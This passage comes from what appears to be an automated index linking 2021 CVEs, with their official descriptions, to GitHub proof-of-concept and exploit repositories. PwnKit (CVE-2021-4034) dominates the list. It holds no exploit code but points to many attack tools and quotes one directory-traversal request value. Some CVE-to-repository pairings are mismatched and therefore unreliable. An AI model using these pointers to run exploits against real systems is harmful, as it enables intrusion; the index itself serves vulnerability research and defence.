- [Fato07/Pwnkit-exploit](https://github.com/Fato07/Pwnkit-exploit)
- [EstamelGG/CVE-2021-4034-NoGCC](https://github.com/EstamelGG/CVE-2021-4034-NoGCC)
- [pengalaman-1t/CVE-2021-4034](https://github.com/pengalaman-1t/CVE-2021-4034)
- [NeonWhiteRabbit/CVE-2021-4034-BASH-One-File-Exploit](https://github.com/NeonWhiteRabbit/CVE-2021-4034-BASH-One-File-Exploit)
- [jpmcb/pwnkit-go](https://github.com/jpmcb/pwnkit-go)
- [JoyGhoshs/CVE-2021-4034](https://github.com/JoyGhoshs/CVE-2021-4034)
- [galoget/PwnKit-CVE-2021-4034](https://github.com/galoget/PwnKit-CVE-2021-4034)
- [Yakumwamba/POC-CVE-2021-4034](https://github.com/Yakumwamba/POC-CVE-2021-4034)
- [ayoub-elbouzi/CVE-2021-4034-Pwnkit](https://github.com/ayoub-elbouzi/CVE-2021-4034-Pwnkit)
- [Sakura-nee/CVE-2021-4034](https://github.com/Sakura-nee/CVE-2021-4034)
- [oreosec/pwnkit](https://github.com/oreosec/pwnkit)
- [CYB3RK1D/CVE-2021-4034-POC](https://github.com/CYB3RK1D/CVE-2021-4034-POC)
- [Rvn0xsy/CVE-2021-4034](https://github.com/Rvn0xsy/CVE-2021-4034)
- [Kirill89/CVE-2021-4034](https://github.com/Kirill89/CVE-2021-4034)
- [qq224015/CVE-2021-4034](https://github.com/qq224015/CVE-2021-4034)
- [NeonWhiteRabbit/CVE-2021-4034](https://github.com/NeonWhiteRabbit/CVE-2021-4034)
- [glowbase/PwnKit-CVE-2021-4034](https://github.com/glowbase/PwnKit-CVE-2021-4034)
- [sofire/polkit-0.96-CVE-2021-4034](https://github.com/sofire/polkit-0.96-CVE-2021-4034)
- [codiobert/pwnkit-scanner](https://github.com/codiobert/pwnkit-scanner)
- [v-rzh/CVE-2021-4034](https://github.com/v-rzh/CVE-2021-4034)
- [TW-D/PwnKit-Vulnerability_CVE-2021-4034](https://github.com/TW-D/PwnKit-Vulnerability_CVE-2021-4034)
- [OXDBXKXO/ez-pwnkit](https://github.com/OXDBXKXO/ez-pwnkit)
- [milot/dissecting-pkexec-cve-2021-4034](https://github.com/milot/dissecting-pkexec-cve-2021-4034)
- [0x01-sec/CVE-2021-4034-](https://github.com/0x01-sec/CVE-2021-4034-)
- [navisec/CVE-2021-4034-PwnKit](https://github.com/navisec/CVE-2021-4034-PwnKit)
- [Almorabea/pkexec-exploit](https://github.com/Almorabea/pkexec-exploit)
- [teelrabbit/Polkit-pkexec-exploit-for-Linux](https://github.com/teelrabbit/Polkit-pkexec-exploit-for-Linux)
- [scent2d/PoC-CVE-2021-4034](https://github.com/scent2d/PoC-CVE-2021-4034)
- [HrishitJoshi/CVE-2021-4034](https://github.com/HrishitJoshi/CVE-2021-4034)
- [Ankit-Ojha16/CVE-2021-4034](https://github.com/Ankit-Ojha16/CVE-2021-4034)
- [G01d3nW01f/CVE-2021-4034](https://github.com/G01d3nW01f/CVE-2021-4034)
- [drapl0n/pwnKit](https://github.com/drapl0n/pwnKit)
- [rvizx/CVE-2021-4034](https://github.com/rvizx/CVE-2021-4034)
- [Joffr3y/Polkit-CVE-2021-4034-HLP](https://github.com/Joffr3y/Polkit-CVE-2021-4034-HLP)
- [ziadsaleemi/polkit_CVE-2021-4034](https://github.com/ziadsaleemi/polkit_CVE-2021-4034)
- [FDlucifer/Pwnkit-go](https://github.com/FDlucifer/Pwnkit-go)
- [cspshivam/cve-2021-4034](https://github.com/cspshivam/cve-2021-4034)
- [an0n7os/CVE-2021-4034](https://github.com/an0n7os/CVE-2021-4034)
- [DanaEpp/pwncat_pwnkit](https://github.com/DanaEpp/pwncat_pwnkit)
- [x04000/CVE-2021-4034](https://github.com/x04000/CVE-2021-4034)
- [x04000/AutoPwnkit](https://github.com/x04000/AutoPwnkit)
- [hohn/codeql-sample-polkit](https://github.com/hohn/codeql-sample-polkit)
- [ck00004/CVE-2021-4034](https://github.com/ck00004/CVE-2021-4034)
- [LJP-TW/CVE-2021-4034](https://github.com/LJP-TW/CVE-2021-4034)
- [fnknda/CVE-2021-4034_POC](https://github.com/fnknda/CVE-2021-4034_POC)
- [Tanmay-N/CVE-2021-4034](https://github.com/Tanmay-N/CVE-2021-4034)
- [hahaleyile/CVE-2021-4034](https://github.com/hahaleyile/CVE-2021-4034)
- [movvamrocks/PwnKit-CVE-2021-4034](https://github.com/movvamrocks/PwnKit-CVE-2021-4034)
- [Squirre17/CVE-2021-4034](https://github.com/Squirre17/CVE-2021-4034)
- [Jesrat/make_me_root](https://github.com/Jesrat/make_me_root)
- [defhacks/cve-2021-4034](https://github.com/defhacks/cve-2021-4034)
- [ITMarcin2211/Polkit-s-Pkexec-CVE-2021-4034](https://github.com/ITMarcin2211/Polkit-s-Pkexec-CVE-2021-4034)
- [edsonjt81/CVE-2021-4034-Linux](https://github.com/edsonjt81/CVE-2021-4034-Linux)
- [nel0x/pwnkit-vulnerability](https://github.com/nel0x/pwnkit-vulnerability)
- [TomSgn/CVE-2021-4034](https://github.com/TomSgn/CVE-2021-4034)
- [battleoverflow/CVE-2021-4034](https://github.com/battleoverflow/CVE-2021-4034)
- [TheJoyOfHacking/berdav-CVE-2021-4034](https://github.com/TheJoyOfHacking/berdav-CVE-2021-4034)
- [tzwlhack/CVE-2021-4034](https://github.com/tzwlhack/CVE-2021-4034)
- [jcatala/f_poc_cve-2021-4034](https://github.com/jcatala/f_poc_cve-2021-4034)
- [Nosferatuvjr/PwnKit](https://github.com/Nosferatuvjr/PwnKit)
- [TotallyNotAHaxxer/CVE-2021-4034](https://github.com/TotallyNotAHaxxer/CVE-2021-4034)
- [rhin0cer0s/CVE-2021-4034](https://github.com/rhin0cer0s/CVE-2021-4034)
- [0x4ndy/CVE-2021-4034-PoC](https://github.com/0x4ndy/CVE-2021-4034-PoC)
- [antoinenguyen-09/CVE-2021-4034](https://github.com/antoinenguyen-09/CVE-2021-4034)
- [wudicainiao/cve-2021-4034](https://github.com/wudicainiao/cve-2021-4034)
- [TanmoyG1800/CVE-2021-4034](https://github.com/TanmoyG1800/CVE-2021-4034)
- [CronoX1/CVE-2021-4034](https://github.com/CronoX1/CVE-2021-4034)
- [supportingmx/cve-2021-4034](https://github.com/supportingmx/cve-2021-4034)
- [A1vinSmith/CVE-2021-4034](https://github.com/A1vinSmith/CVE-2021-4034)
- [HellGateCorp/pwnkit](https://github.com/HellGateCorp/pwnkit)
- [Silencecyber/cve-2021-4034](https://github.com/Silencecyber/cve-2021-4034)
- [Geni0r/cve-2021-4034-poc](https://github.com/Geni0r/cve-2021-4034-poc)
- [zxc2007/CVE-2021-4034](https://github.com/zxc2007/CVE-2021-4034)
- [Pixailz/CVE-2021-4034](https://github.com/Pixailz/CVE-2021-4034)
- [toecesws/CVE-2021-4034](https://github.com/toecesws/CVE-2021-4034)
- [jehovah2002/CVE-2021-4034-pwnkit](https://github.com/jehovah2002/CVE-2021-4034-pwnkit)
- [fei9747/CVE-2021-4034](https://github.com/fei9747/CVE-2021-4034)
- [pyhrr0/pwnkit](https://github.com/pyhrr0/pwnkit)
- [mutur4/CVE-2021-4034](https://github.com/mutur4/CVE-2021-4034)
- [h3xcr4ck3r/CVE-2021-4034_Python3](https://github.com/h3xcr4ck3r/CVE-2021-4034_Python3)
- [TheSermux/CVE-2021-4034](https://github.com/TheSermux/CVE-2021-4034)
- [ps-interactive/lab_cve-2021-4034-polkit-emulation-and-detection](https://github.com/ps-interactive/lab_cve-2021-4034-polkit-emulation-and-detection)
- [asepsaepdin/CVE-2021-4034](https://github.com/asepsaepdin/CVE-2021-4034)
- [JohnGilbert57/CVE-2021-4034-Capture-the-flag](https://github.com/JohnGilbert57/CVE-2021-4034-Capture-the-flag)
- [Part01-Pai/Polkit-Permission-promotion-compiled](https://github.com/Part01-Pai/Polkit-Permission-promotion-compiled)
- [cdxiaodong/CVE-2021-4034-touch](https://github.com/cdxiaodong/CVE-2021-4034-touch)
- [LucasPDiniz/CVE-2021-4034](https://github.com/LucasPDiniz/CVE-2021-4034)
- [Pol-Ruiz/CVE-2021-4034](https://github.com/Pol-Ruiz/CVE-2021-4034)
- [cerodah/CVE-2021-4034](https://github.com/cerodah/CVE-2021-4034)
- [FancySauce/PwnKit-CVE-2021-4034](https://github.com/FancySauce/PwnKit-CVE-2021-4034)
- [wechicken456/CVE-2021-4034-CTF-writeup](https://github.com/wechicken456/CVE-2021-4034-CTF-writeup)
- [ASG-CASTLE/CVE-2021-4034](https://github.com/ASG-CASTLE/CVE-2021-4034)
- [X-Projetion/Exploiting-PwnKit-CVE-2021-4034-](https://github.com/X-Projetion/Exploiting-PwnKit-CVE-2021-4034-)
- [evkl1d/CVE-2021-4034](https://github.com/evkl1d/CVE-2021-4034)
- [Typical0day/CVE-2021-4034](https://github.com/Typical0day/CVE-2021-4034)
- [lsclsclsc/CVE-2021-4034](https://github.com/lsclsclsc/CVE-2021-4034)
- [EuJin03/CVE-2021-4034-PoC](https://github.com/EuJin03/CVE-2021-4034-PoC)
### CVE-2021-4043 (2022-02-04)
NULL Pointer Dereference in GitHub repository gpac/gpac prior to 1.1.0.
- [cyberark/PwnKit-Hunter](https://github.com/cyberark/PwnKit-Hunter)
### CVE-2021-4044 (2021-12-14)
Internally libssl in OpenSSL calls X509_verify_cert() on the client side to verify a certificate supplied by a server. That function may return a negative return value to indicate an internal error (for example out of memory). Such a negative return value is mishandled by OpenSSL and will cause an IO function (such as SSL_connect() or SSL_do_handshake()) to not indicate success and a subsequent call to SSL_get_error() to return the value SSL_ERROR_WANT_RETRY_VERIFY. This return value is only supposed to be returned by OpenSSL if the application has previously called SSL_CTX_set_cert_verify_callback(). Since most applications do not do this the SSL_ERROR_WANT_RETRY_VERIFY return value from SSL_get_error() will be totally unexpected and applications may not behave correctly as a result. The exact behaviour will depend on the application but it could result in crashes, infinite loops or other similar incorrect responses. This issue is made more serious in combination with a separate bug in OpenSSL 3.0 that will cause X509_verify_cert() to indicate an internal error when processing a certificate chain. This will occur where a certificate does not include the Subject Alternative Name extension but where a Certificate Authority has enforced name constraints. This issue can occur even with valid chains. By combining the two issues an attacker could induce incorrect, application dependent behaviour. Fixed in OpenSSL 3.0.1 (Affected 3.0.0).
- [phirojshah/CVE-2021-4044](https://github.com/phirojshah/CVE-2021-4044)
### CVE-2021-4045 (2022-03-07)
TP-Link Tapo C200 IP camera, on its 1.1.15 firmware version and below, is affected by an unauthenticated RCE vulnerability, present in the uhttpd binary running by default as root. The exploitation of this vulnerability allows an attacker to take full control of the camera.
- [hacefresko/CVE-2021-4045](https://github.com/hacefresko/CVE-2021-4045)
- [jeffbezosispogg/CVE-2021-4045](https://github.com/jeffbezosispogg/CVE-2021-4045)
- [pl4int3xt/CVE-2021-4045](https://github.com/pl4int3xt/CVE-2021-4045)
### CVE-2021-4104 (2021-12-14)
JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration. The attacker can provide TopicBindingName and TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2 when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions.
- [cckuailong/log4shell_1.x](https://github.com/cckuailong/log4shell_1.x)
- [open-AIMS/log4j](https://github.com/open-AIMS/log4j)
### CVE-2021-4154 (2022-02-04)
A use-after-free flaw was found in cgroup1_parse_param in kernel/cgroup/cgroup-v1.c in the Linux kernel's cgroup v1 parser. A local attacker with a user privilege could cause a privilege escalation by exploiting the fsconfig syscall parameter leading to a container breakout and a denial of service on the system.
- [Markakd/CVE-2021-4154](https://github.com/Markakd/CVE-2021-4154)
- [veritas501/CVE-2021-4154](https://github.com/veritas501/CVE-2021-4154)
### CVE-2021-4191 (2022-03-28)
An issue has been discovered in GitLab CE/EE affecting versions 13.0 to 14.6.5, 14.7 to 14.7.4, and 14.8 to 14.8.2. Private GitLab instances with restricted sign-ups may be vulnerable to user enumeration to unauthenticated users through the GraphQL API.
- [Adelittle/CVE-2021-4191_Exploits](https://github.com/Adelittle/CVE-2021-4191_Exploits)
- [K3ysTr0K3R/CVE-2021-4191-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2021-4191-EXPLOIT)
### CVE-2021-4204 (2022-08-24)
An out-of-bounds (OOB) memory access flaw was found in the Linux kernel's eBPF due to an Improper Input Validation. This flaw allows a local attacker with a special privilege to crash the system or leak internal information.
- [tr3ee/CVE-2021-4204](https://github.com/tr3ee/CVE-2021-4204)
### CVE-2021-4428 (2023-07-18)
In what3words Autosuggest Plugin bis 4.0.0 für WordPress wurde eine Schwachstelle gefunden. Sie wurde als problematisch eingestuft. Betroffen ist die Funktion enqueue_scripts der Datei w3w-autosuggest/public/class-w3w-autosuggest-public.php der Komponente Setting Handler. Mit der Manipulation mit unbekannten Daten kann eine information disclosure-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk passieren. Ein Aktualisieren auf die Version 4.0.1 vermag dieses Problem zu lösen. Der Patch wird als dd59cbac5f86057d6a73b87007c08b8bfa0c32ac bezeichnet. Als bestmögliche Massnahme wird das Einspielen eines Upgrades empfohlen.
- [CERT-hr/Log4Shell](https://github.com/CERT-hr/Log4Shell)
### CVE-2021-6857
- [zi0n8/CVE-2021-6857](https://github.com/zi0n8/CVE-2021-6857)
### CVE-2021-6901
- [mooneee/cve-2021-6901](https://github.com/mooneee/cve-2021-6901)
### CVE-2021-10086
- [AK-blank/CVE-2021-10086](https://github.com/AK-blank/CVE-2021-10086)
### CVE-2021-20021 (2021-04-09)
A vulnerability in the SonicWall Email Security version 10.0.9.x allows an attacker to create an administrative account by sending a crafted HTTP request to the remote host.
- [SUPRAAA-1337/CVE-2021-20021](https://github.com/SUPRAAA-1337/CVE-2021-20021)
### CVE-2021-20038 (2021-12-08)
A Stack-based buffer overflow vulnerability in SMA100 Apache httpd server's mod_cgi module environment variables allows a remote unauthenticated attacker to potentially execute code as a 'nobody' user in the appliance. This vulnerability affected SMA 200, 210, 400, 410 and 500v appliances firmware 10.2.0.8-37sv, 10.2.1.1-19sv, 10.2.1.2-24sv and earlier versions.
- [jbaines-r7/badblood](https://github.com/jbaines-r7/badblood)
- [vesperp/CVE-2021-20038-SonicWall-RCE](https://github.com/vesperp/CVE-2021-20038-SonicWall-RCE)
### CVE-2021-20138 (2021-12-09)
An unauthenticated command injection vulnerability exists in multiple parameters in the Gryphon Tower router’s web interface at /cgi-bin/luci/rc. An unauthenticated remote attacker on the same network can execute commands as root on the device by sending a specially crafted malicious packet to the web interface.
- [ShaikUsaf/frameworks_base_AOSP10_r33_CVE-2021-20138](https://github.com/ShaikUsaf/frameworks_base_AOSP10_r33_CVE-2021-20138)
### CVE-2021-20233 (2021-03-03)
A flaw was found in grub2 in versions prior to 2.06. Setparam_prefix() in the menu rendering code performs a length calculation on the assumption that expressing a quoted single quote will require 3 characters, while it actually requires 4 characters which allows an attacker to corrupt memory by one byte for each quote in the input. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
- [pauljrowland/BootHoleFix](https://github.com/pauljrowland/BootHoleFix)
### CVE-2021-20253 (2021-03-09)
A flaw was found in ansible-tower. The default installation is vulnerable to Job Isolation escape allowing an attacker to elevate the privilege from a low privileged user to the awx user from outside the isolated environment. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
- [mbadanoiu/CVE-2021-20253](https://github.com/mbadanoiu/CVE-2021-20253)
### CVE-2021-20294 (2021-04-29)
A flaw was found in binutils readelf 2.35 program. An attacker who is able to convince a victim using readelf to read a crafted file could trigger a stack buffer overflow, out-of-bounds write of arbitrary data supplied by the attacker. The highest impact of this flaw is to confidentiality, integrity, and availability.
- [tin-z/CVE-2021-20294-POC](https://github.com/tin-z/CVE-2021-20294-POC)
### CVE-2021-20323 (2022-03-25)
A POST based reflected Cross Site Scripting vulnerability on has been identified in Keycloak.
- [ndmalc/CVE-2021-20323](https://github.com/ndmalc/CVE-2021-20323)
- [Cappricio-Securities/CVE-2021-20323](https://github.com/Cappricio-Securities/CVE-2021-20323)
- [cscpwn0sec/CVE-2021-20323](https://github.com/cscpwn0sec/CVE-2021-20323)
### CVE-2021-20717 (2021-05-10)
Cross-site scripting vulnerability in EC-CUBE 4.0.0 to 4.0.5 allows a remote attacker to inject a specially crafted script in the specific input field of the EC web site which is created using EC-CUBE. As a result, it may lead to an arbitrary script execution on the administrator's web browser.
- [s-index/CVE-2021-20717](https://github.com/s-index/CVE-2021-20717)
### CVE-2021-20837 (2021-10-26)
Movable Type 7 r.5002 and earlier (Movable Type 7 Series), Movable Type 6.8.2 and earlier (Movable Type 6 Series), Movable Type Advanced 7 r.5002 and earlier (Movable Type Advanced 7 Series), Movable Type Advanced 6.8.2 and earlier (Movable Type Advanced 6 Series), Movable Type Premium 1.46 and earlier, and Movable Type Premium Advanced 1.46 and earlier allow remote attackers to execute arbitrary OS commands via unspecified vectors. Note that all versions of Movable Type 4.0 or later including unsupported (End-of-Life, EOL) versions are also affected by this vulnerability.
- [ghost-nemesis/cve-2021-20837-poc](https://github.com/ghost-nemesis/cve-2021-20837-poc)
- [orangmuda/CVE-2021-20837](https://github.com/orangmuda/CVE-2021-20837)
- [Cosemz/CVE-2021-20837](https://github.com/Cosemz/CVE-2021-20837)
- [bb33bb/CVE-2021-20837](https://github.com/bb33bb/CVE-2021-20837)
### CVE-2021-21014 (2021-02-11)
Magento versions 2.4.1 (and earlier), 2.4.0-p1 (and earlier) and 2.3.6 (and earlier) are vulnerable to a file upload restriction bypass. Successful exploitation could lead to arbitrary code execution by an authenticated attacker. Access to the admin console is required for successful exploitation.
- [HoangKien1020/CVE-2021-21014](https://github.com/HoangKien1020/CVE-2021-21014)
### CVE-2021-21017 (2021-02-11)
Acrobat Reader DC versions versions 2020.013.20074 (and earlier), 2020.001.30018 (and earlier) and 2017.011.30188 (and earlier) are affected by a heap-based buffer overflow vulnerability. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.
- [ZeusBox/CVE-2021-21017](https://github.com/ZeusBox/CVE-2021-21017)
- [tzwlhack/CVE-2021-21017](https://github.com/tzwlhack/CVE-2021-21017)
### CVE-2021-21042 (2021-02-11)
Acrobat Reader DC versions 2020.013.20074 (and earlier), 2020.001.30018 (and earlier) and 2017.011.30188 (and earlier) are affected by an Out-of-bounds Read vulnerability that could lead to arbitrary disclosure of information in the memory stack. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.
- [NattiSamson/CVE-2021-21042](https://github.com/NattiSamson/CVE-2021-21042)
- [r1l4-i3pur1l4/CVE-2021-21042](https://github.com/r1l4-i3pur1l4/CVE-2021-21042)
### CVE-2021-21086 (2021-09-02)
Acrobat Reader DC versions versions 2020.013.20074 (and earlier), 2020.001.30018 (and earlier) and 2017.011.30188 (and earlier) are affected by an Out-of-bounds Write vulnerability in the CoolType library. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.
- [infobyte/Exploit-CVE-2021-21086](https://github.com/infobyte/Exploit-CVE-2021-21086)
### CVE-2021-21110 (2021-01-08)
Use after free in safe browsing in Google Chrome prior to 87.0.4280.141 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page.
- [Gh0st0ne/CVE-2021-21110](https://github.com/Gh0st0ne/CVE-2021-21110)
### CVE-2021-21123 (2021-02-09)
Insufficient data validation in File System API in Google Chrome prior to 88.0.4324.96 allowed a remote attacker to bypass filesystem restrictions via a crafted HTML page.
- [Puliczek/CVE-2021-21123-PoC-Google-Chrome](https://github.com/Puliczek/CVE-2021-21123-PoC-Google-Chrome)
### CVE-2021-21148 (2021-02-09)
Heap buffer overflow in V8 in Google Chrome prior to 88.0.4324.150 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.
- [Grayhaxor/CVE-2021-21148](https://github.com/Grayhaxor/CVE-2021-21148)
### CVE-2021-21193 (2021-03-16)
Use after free in Blink in Google Chrome prior to 89.0.4389.90 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.
- [mehrzad1994/CVE-2021-21193](https://github.com/mehrzad1994/CVE-2021-21193)
### CVE-2021-21220 (2021-04-26)
Insufficient validation of untrusted input in V8 in Google Chrome prior to 89.0.4389.128 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.
- [security-dbg/CVE-2021-21220](https://github.com/security-dbg/CVE-2021-21220)
### CVE-2021-21234 (2021-01-05)
spring-boot-actuator-logview in a library that adds a simple logfile viewer as spring boot actuator endpoint. It is maven package "eu.hinsch:spring-boot-actuator-logview". In spring-boot-actuator-logview before version 0.2.13 there is a directory traversal vulnerability. The nature of this library is to expose a log file directory via admin (spring boot actuator) HTTP endpoints. Both the filename to view and a base folder (relative to the logging folder root) can be specified via request parameters. While the filename parameter was checked to prevent directory traversal exploits (so that `filename=../somefile` would not work), the base folder parameter was not sufficiently checked, so that `filename=somefile&base=../` could access a file outside the logging base directory). The vulnerability has been patched in release 0.2.13. Any users of 0.2.12 should be able to update without any issues as there are no other changes in that release. There is no workaround to fix the vulnerability other than updating or removing the dependency. However, removing read access of the user the application is run with to any directory not required for running the application can limit the impact. Additionally, access to the logview endpoint can be limited by deploying the application behind a reverse proxy.
- [PwCNO-CTO/CVE-2021-21234](https://github.com/PwCNO-CTO/CVE-2021-21234)
- [xiaojiangxl/CVE-2021-21234](https://github.com/xiaojiangxl/CVE-2021-21234)
### CVE-2021-21239 (2021-01-21)
PySAML2 is a pure python implementation of SAML Version 2 Standard. PySAML2 before 6.5.0 has an improper verification of cryptographic signature vulnerability. Users of pysaml2 that use the default CryptoBackendXmlSec1 backend and need to verify signed SAML documents are impacted. PySAML2 does not ensure that a signed SAML document is correctly signed. The default CryptoBackendXmlSec1 backend is using the xmlsec1 binary to verify the signature of signed SAML documents, but by default xmlsec1 accepts any type of key found within the given document. xmlsec1 needs to be configured explicitly to only use only _x509 certificates_ for the verification process of the SAML document signature. This is fixed in PySAML2 6.5.0.
- [RyanBoomer30/CVE-2021-21239-Exploit](https://github.com/RyanBoomer30/CVE-2021-21239-Exploit)
### CVE-2021-21300 (2021-03-09)
Git is an open-source distributed revision control system. In affected versions of Git a specially crafted repository that contains symbolic links as well as files using a clean/smudge filter such as Git LFS, may cause just-checked out script to be executed while cloning onto a case-insensitive file system such as NTFS, HFS+ or APFS (i.e. the default file systems on Windows and macOS). Note that clean/smudge filters have to be configured for that. Git for Windows configures Git LFS by default, and is therefore vulnerable. The problem has been patched in the versions published on Tuesday, March 9th, 2021. As a workaound, if symbolic link support is disabled in Git (e.g. via `git config --global core.symlinks false`), the described attack won't work. Likewise, if no clean/smudge filters such as Git LFS are configured globally (i.e. _before_ cloning), the attack is foiled. As always, it is best to avoid cloning repositories from untrusted sources. The earliest impacted version is 2.14.2. The fix versions are: 2.30.1, 2.29.3, 2.28.1, 2.27.1, 2.26.3, 2.25.5, 2.24.4, 2.23.4, 2.22.5, 2.21.4, 2.20.5, 2.19.6, 2.18.5, 2.17.62.17.6.
- [AlkenePan/CVE-2021-21300](https://github.com/AlkenePan/CVE-2021-21300)
- [Faisal78123/CVE-2021-21300](https://github.com/Faisal78123/CVE-2021-21300)
- [erranfenech/CVE-2021-21300](https://github.com/erranfenech/CVE-2021-21300)
- [Maskhe/CVE-2021-21300](https://github.com/Maskhe/CVE-2021-21300)
- [1uanWu/CVE-2021-21300](https://github.com/1uanWu/CVE-2021-21300)
- [Kirill89/CVE-2021-21300](https://github.com/Kirill89/CVE-2021-21300)
- [ETOCheney/cve-2021-21300](https://github.com/ETOCheney/cve-2021-21300)
- [fengzhouc/CVE-2021-21300](https://github.com/fengzhouc/CVE-2021-21300)
- [danshuizhangyu/CVE-2021-21300](https://github.com/danshuizhangyu/CVE-2021-21300)
- [0ahu/CVE-2021-21300](https://github.com/0ahu/CVE-2021-21300)
- [macilin/CVE-2021-21300](https://github.com/macilin/CVE-2021-21300)
- [Roboterh/CVE-2021-21300](https://github.com/Roboterh/CVE-2021-21300)
- [henry861010/Network_Security_NYCU](https://github.com/henry861010/Network_Security_NYCU)
- [Saboor-Hakimi-23/CVE-2021-21300](https://github.com/Saboor-Hakimi-23/CVE-2021-21300)
### CVE-2021-21311 (2021-02-11)
Adminer is an open-source database management in a single PHP file. In adminer from version 4.0.0 and before 4.7.9 there is a server-side request forgery vulnerability. Users of Adminer versions bundling all drivers (e.g. `adminer.php`) are affected. This is fixed in version 4.7.9.
- [llhala/CVE-2021-21311](https://github.com/llhala/CVE-2021-21311)
- [omoknooni/CVE-2021-21311](https://github.com/omoknooni/CVE-2021-21311)
### CVE-2021-21315 (2021-02-16)
The System Information Library for Node.JS (npm package "systeminformation") is an open source collection of functions to retrieve detailed hardware, system and OS information. In systeminformation before version 5.3.1 there is a command injection vulnerability. Problem was fixed in version 5.3.1. As a workaround instead of upgrading, be sure to check or sanitize service parameters that are passed to si.inetLatency(), si.inetChecksite(), si.services(), si.processLoad() ... do only allow strings, reject any arrays. String sanitation works as expected.
- [ForbiddenProgrammer/CVE-2021-21315-PoC](https://github.com/ForbiddenProgrammer/CVE-2021-21315-PoC)
- [cherrera0001/CVE-2021-21315v2](https://github.com/cherrera0001/CVE-2021-21315v2)
- [MazX0p/CVE-2021-21315-exploit](https://github.com/MazX0p/CVE-2021-21315-exploit)
- [alikarimi999/CVE-2021-21315](https://github.com/alikarimi999/CVE-2021-21315)
- [G01d3nW01f/CVE-2021-21315](https://github.com/G01d3nW01f/CVE-2021-21315)
- [xMohamed0/CVE-2021-21315-POC](https://github.com/xMohamed0/CVE-2021-21315-POC)
### CVE-2021-21341 (2021-03-22)
XStream is a Java library to serialize objects to XML and back again. In XStream before version 1.4.16, there is vulnerability which may allow a remote attacker to allocate 100% CPU time on the target system depending on CPU type or parallel execution of such a payload resulting in a denial of service only by manipulating the processed input stream. No user is affected who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. If you rely on XStream's default blacklist of the Security Framework, you will have to use at least version 1.4.16.
- [s-index/CVE-2021-21341](https://github.com/s-index/CVE-2021-21341)
- [Mani1325/ka-cve-2021-21341](https://github.com/Mani1325/ka-cve-2021-21341)
### CVE-2021-21349 (2021-03-22)
XStream is a Java library to serialize objects to XML and back again. In XStream before version 1.4.16, there is a vulnerability which may allow a remote attacker to request data from internal resources that are not publicly available only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. If you rely on XStream's default blacklist of the Security Framework, you will have to use at least version 1.4.16.
- [s-index/CVE-2021-21349](https://github.com/s-index/CVE-2021-21349)
### CVE-2021-21380 (2021-03-23)
XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. In affected versions of XWiki Platform (and only those with the Ratings API installed), the Rating Script Service expose an API to perform SQL requests without escaping the from and where search arguments. This might lead to an SQL script injection quite easily for any user having Script rights on XWiki. The problem has been patched in XWiki 12.9RC1. The only workaround besides upgrading XWiki would be to uninstall the Ratings API in XWiki from the Extension Manager.
- [rvermeulen/codeql-workshop-cve-2021-21380](https://github.com/rvermeulen/codeql-workshop-cve-2021-21380)
### CVE-2021-21389 (2021-03-26)
BuddyPress is an open source WordPress plugin to build a community site. In releases of BuddyPress from 5.0.0 before 7.2.1 it's possible for a non-privileged, regular user to obtain administrator rights by exploiting an issue in the REST API members endpoint. The vulnerability has been fixed in BuddyPress 7.2.1. Existing installations of the plugin should be updated to this version to mitigate the issue.
- [HoangKien1020/CVE-2021-21389](https://github.com/HoangKien1020/CVE-2021-21389)
### CVE-2021-21402 (2021-03-23)
Jellyfin is a Free Software Media System. In Jellyfin before version 10.7.1, with certain endpoints, well crafted requests will allow arbitrary file read from a Jellyfin server's file system. This issue is more prevalent when Windows is used as the host OS. Servers that are exposed to the public Internet are potentially at risk. This is fixed in version 10.7.1. As a workaround, users may be able to restrict some access by enforcing strict security permissions on their filesystem, however, it is recommended to update as soon as possible.
- [jiaocoll/CVE-2021-21402-Jellyfin](https://github.com/jiaocoll/CVE-2021-21402-Jellyfin)
- [somatrasss/CVE-2021-21402](https://github.com/somatrasss/CVE-2021-21402)
- [givemefivw/CVE-2021-21402](https://github.com/givemefivw/CVE-2021-21402)
### CVE-2021-21425 (2021-04-07)
Grav Admin Plugin is an HTML user interface that provides a way to configure Grav and create and modify pages. In versions 1.10.7 and earlier, an unauthenticated user can execute some methods of administrator controller without needing any credentials. Particular method execution will result in arbitrary YAML file creation or content change of existing YAML files on the system. Successfully exploitation of that vulnerability results in configuration changes, such as general site information change, custom scheduler job definition, etc. Due to the nature of the vulnerability, an adversary can change some part of the webpage, or hijack an administrator account, or execute operating system command under the context of the web-server user. This vulnerability is fixed in version 1.10.8. Blocking access to the `/admin` path from untrusted sources can be applied as a workaround.
- [CsEnox/CVE-2021-21425](https://github.com/CsEnox/CVE-2021-21425)
- [frknktlca/GravCMS_Nmap_Script](https://github.com/frknktlca/GravCMS_Nmap_Script)
### CVE-2021-21514 (2021-03-02)
Dell EMC OpenManage Server Administrator (OMSA) versions 9.5 and prior contain a path traversal vulnerability. A remote user with admin privileges could potentially exploit this vulnerability to view arbitrary files on the target system by sending a specially crafted URL request.
- [und3sc0n0c1d0/AFR-in-OMSA](https://github.com/und3sc0n0c1d0/AFR-in-OMSA)
### CVE-2021-21551 (2021-05-04)
Dell dbutil_2_3.sys driver contains an insufficient access control vulnerability which may lead to escalation of privileges, denial of service, or information disclosure. Local authenticated user access is required.
